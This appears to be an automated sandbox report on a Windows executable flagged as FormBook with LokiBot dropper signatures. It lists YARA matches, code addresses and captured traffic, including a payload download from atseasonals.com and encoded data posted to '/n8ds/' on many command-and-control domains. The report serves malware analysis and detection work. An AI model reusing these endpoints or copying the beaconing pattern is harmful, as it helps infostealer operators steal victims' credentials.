HTTP traffic detected: POST /n8ds/ HTTP/1.1Host: www.inklusion.onlineConnection: closeContent-Length: 131142Cache-Control: no-cacheOrigin: http://www.inklusion.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.inklusion.online/n8ds/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 36 6c 64 44 3d 33 56 45 69 59 58 53 66 54 54 54 35 52 6b 67 39 58 4c 78 76 35 4a 39 46 77 44 34 32 41 57 44 75 43 38 4d 7a 52 61 6e 69 76 71 45 6e 38 4b 6f 79 66 6b 55 4f 47 44 69 6d 58 77 77 58 48 37 58 6b 4e 59 34 6f 4e 63 6b 78 69 7a 31 68 67 70 79 4d 6d 67 6e 61 6c 30 67 69 47 4f 76 30 77 55 51 58 6c 52 4d 62 6f 79 6f 55 35 73 62 34 78 37 6a 33 75 7a 7e 75 28 53 35 6d 28 6c 69 5a 4e 39 6e 30 7a 35 32 6a 65 76 30 69 35 46 36 30 73 52 64 71 63 34 76 4a 28 77 4b 46 67 42 50 36 39 75 46 56 6a 71 39 6f 56 38 6f 50 50 5a 38 4d 58 30 72 63 4f 4e 76 31 7a 79 37 4e 38 44 34 52 6d 33 4d 4a 31 53 58 36 6e 42 39 42 36 4a 71 45 45 55 49 62 5a 72 58 6f 33 65 55 77 47 79 62 5f 69 59 31 47 6e 74 71 64 75 4b 64 31 78 75 34 57 50 57 6c 4a 6c 54 4b 4f 39 4b 73 66 6c 4e 47 54 33 67 53 64 53 44 6d 30 69 5f 4d 54 64 45 6d 68 4d 69 6f 54 31 35 79 37 45 4f 7e 66 6a 70 4e 2d 59 45 67 47 28 56 50 70 49 59 78 4e 6e 41 41 44 44 46 56 49 33 6e 61 56 37 79 70 39 58 35 46 46 35 56 66 50 76 55 39 43 4f 30 68 61 55 61 45 4c 66 33 72 5f 6c 76 45 34 61 73 48 36 78 4a 6d 70 46 6b 65 2d 4c 42 62 71 39 46 78 34 76 4c 51 34 63 42 62 64 4a 65 71 65 70 4c 52 6e 49 4b 6e 67 42 70 66 44 50 6c 73 5a 77 73 62 43 4d 31 45 31 66 63 72 5f 65 35 42 52 6a 56 41 49 7e 36 35 62 34 46 66 33 42 4c 51 7a 6b 75 4c 62 51 68 45 5f 67 50 59 65 70 73 54 47 69 76 68 32 6e 6f 57 74 32 36 53 45 6b 5a 63 49 48 4f 74 6b 63 4f 41 4b 68 62 6c 51 6e 34 64 7a 30 4a 54 51 28 38 4f 67 30 33 49 6d 66 43 4f 67 4a 73 4c 63 6e 77 4f 72 44 56 45 66 62 51 4c 72 6d 65 52 79 74 37 62 63 43 46 58 72 75 55 44 65 61 6d 59 47 66 46 64 55 32 54 6e 77 66 5a 51 64 38 32 6c 2d 36 75 47 4c 66 64 75 41 68 4c 33 65 64 71 5a 37 6c 4a 6a 47 72 6b 79 38 70 44 76 4b 50 72 49 53 70 4b 44 76 59 6c 39 6e 66 41 64 75 32 51 44 55 62 31 39 31 31 6a 65 78 73 66 7e 46 61 54 64 79 74 41 6f 30 6f 70 28 54 55 53 36 56 53 56 50 44 70 75 28 4b 6e 36 52 57 42 63 46 30 35 36 62 61 49 4f 6a 6d 6b 43 30 75 33 54 5a 33 59 41 61 35 49 45 51 7a 75 64 69 64 31 37 62 37 44 50 7e 45 31 46 4c 30 43 37 4e 6a 65 42 4d 66 55 39 4f 4d 55 36 58 58 79 49 33 33 58 34 4c 4d 72 53 70 6b 78 53 34 2d 67 32 37 49 4b 71 65 79 6b 5a 6f 56 4c 56 66 67 4a 79 6e 77 30 56 71 44 32 4f 67 75 7e 41 59 6c 57 7a 39 42 47 53 53 71 61 2d 70 53 6c 44 34 71 43 6e 52 6b 62 77 31 63 57 6b 54 41 30 6f 4a 43 57 6f 63 31 49 73 31 50 4e 4b 4c 4f 46 4e 47 30 43 6b 4a 6d 37 52 79 66 71 62 6f 52 7a 6d 62 72 46 36 4a 75 65 68 32 58 74 65 48 38 70 6f 73 35 36 37 55 37 54 71 57 64 71 66 62 46 78 4a 62 56 4a 51 38 32 51 72 52 6b 4f 43 70 49 5a 45 57 6a 4b 58 43 32 5a 73 4d 53 35 77 34 56 57

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: atseasonals.com

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /GHrtt/bin_kbJoepxz175.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: atseasonals.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /GHrtt/bin_kbJoepxz175.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: atseasonals.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /GHrtt/bin_kbJoepxz175.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: atseasonals.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /GHrtt/bin_kbJoepxz175.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: atseasonals.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=WOFmZk82z8UpNC4mY/AvD/Zy3C9NxlTUz/ym6JpmI0LbMg439xvRHQoxZAlOCyCIZ92f&v6Mt=3fxxA4Z HTTP/1.1Host: www.topwowshopping.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=c2GcPcxTJCn2LTXtZlkaUw2pSxcw64fMJrFLz4vK/kX5/sVAgoQGq8HC2c+bDUK23KGm&v6Mt=3fxxA4Z HTTP/1.1Host: www.growebox.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=XGdb25Y748Ut0VrvAGrAV9TZskQ8Vhp7eMrkuH6lQS7YMNVmEhdbMrp7c3mVg154ue/4&v6Mt=3fxxA4Z HTTP/1.1Host: www.ayudavida.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=QiVr4NomMTfDVQzLAZiPy17hhsXauZOjQhEkIhfcDYRSe01pzyB5iClqESLJZee3iuRd&v6Mt=3fxxA4Z HTTP/1.1Host: www.stylesbykee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=4vxveAhDLD1bBBVBYGklTAgHIjczf9yiSG6BwPp//N0BMhpP0xQNoBxeqzaksixrbhTl&5jp=eZ4Pez HTTP/1.1Host: www.helpcloud.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=n1UrTr6j/bQFz4e4Cp8BbMP0v/KiHdXZ9JkrSrs2y278xAws0T3fM8y5E13MJVyQk50j&5jp=eZ4Pez HTTP/1.1Host: www.ozattaos.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&5jp=eZ4Pez HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=diws0RRfDxwvVlRuoC4BJCkr8rc2YRL+Z6kcdn/HANybL0ntvNIGnh8uTRYHcPOHwusF&5jp=eZ4Pez HTTP/1.1Host: www.unitedmetal-saudi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?2dfPiT=o6P8yX&6ldD=xlQ0Win+OWEEdOu7BqbL/FEFl5i/i6MXL9UXMpB5xFgkztpNPhPNR2/8wQo9B3jWcPv9 HTTP/1.1Host: www.divorcefearfreedom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=BkWPMdYTTR0ZQmtbwmm8ayu+d1W65DpSRIKYH6pwPIESNdIBtEF9Jb3WD/+idhQ1krue&2dfPiT=o6P8yX HTTP/1.1Host: www.jamiecongedo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=nk91cKg8qOwhKsLnO/dUua/naUDhyNO+v5raVsad7WuGJwv5YN6kPTcjqATZ67dmN8K4&v6Mt=3fxxA4Z HTTP/1.1Host: www.lopsrental.leaseConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1Host: www.inklusion.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z HTTP/1.1Host: www.mackthetruck.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49837 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 107.6.148.162:443 -> 192.168.11.20:49841 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000019.00000000.50661482100.0000000040097000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 00000019.00000002.50719644805.0000000040097000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000000.50714091090.0000000040097000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.51929622698.0000000004887000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com

Uses 32bit PE files

Source: Zr26f1rL6r.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Yara signature match

Source: 00000019.00000000.50661482100.0000000040097000.00000004.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000002.50719644805.0000000040097000.00000004.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000F.00000002.51918146774.0000000000540000.00000004.00000020.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.51917426934.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.47948793587.000000001E520000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000000.47834355504.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000000.50714091090.0000000040097000.00000004.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.47938169208.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.51921251635.0000000000C70000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.51929622698.0000000004887000.00000004.00020000.sdmp, type: MEMORY	Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.51921478226.0000000000CA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000000.47886932964.0000000011F4F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE

Detected potential crypto function

Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_00401772		2_2_00401772
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_00401725		2_2_00401725
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_00401536		2_2_00401536
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02322AD2		2_2_02322AD2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02312386		2_2_02312386
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231C88B		2_2_0231C88B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_023206A2		2_2_023206A2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231523E		2_2_0231523E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0232322B		2_2_0232322B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02315814		2_2_02315814
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02311069		2_2_02311069
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02321161		2_2_02321161
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231CE0C		2_2_0231CE0C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02320754		2_2_02320754
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231FFED		2_2_0231FFED
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_023104A3		2_2_023104A3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_02321490		2_2_02321490
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 2_2_0231A574		2_2_0231A574
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E980EAD		10_2_1E980EAD
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D1EB2		10_2_1E8D1EB2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E989ED2		10_2_1E989ED2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C2EE8		10_2_1E8C2EE8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E912E48		10_2_1E912E48
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8F0E50		10_2_1E8F0E50
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E970E6D		10_2_1E970E6D
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98EFBF		10_2_1E98EFBF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E981FC6		10_2_1E981FC6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D6FE0		10_2_1E8D6FE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DCF00		10_2_1E8DCF00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98FF63		10_2_1E98FF63
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E969C98		10_2_1E969C98
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8E8CDF		10_2_1E8E8CDF
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EFCE0		10_2_1E8EFCE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E99ACEB		10_2_1E99ACEB
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E957CE8		10_2_1E957CE8
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8C0C12		10_2_1E8C0C12
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8DAC20		10_2_1E8DAC20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E97EC4C		10_2_1E97EC4C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D3C60		10_2_1E8D3C60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E986C69		10_2_1E986C69
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98EC60		10_2_1E98EC60
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8E2DB0		10_2_1E8E2DB0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D9DD0		10_2_1E8D9DD0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E96FDF4		10_2_1E96FDF4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8CAD00		10_2_1E8CAD00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98FD27		10_2_1E98FD27
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E987D4C		10_2_1E987D4C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0D69		10_2_1E8D0D69
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98FA89		10_2_1E98FA89
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8EFAA0		10_2_1E8EFAA0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98CA13		10_2_1E98CA13
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98EA5B		10_2_1E98EA5B
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E944BC0		10_2_1E944BC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E90DB19		10_2_1E90DB19
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8D0B10		10_2_1E8D0B10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E98FB2E		10_2_1E98FB2E
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E8E6882		10_2_1E8E6882
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E9498B2		10_2_1E9498B2
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E9818DA		10_2_1E9818DA
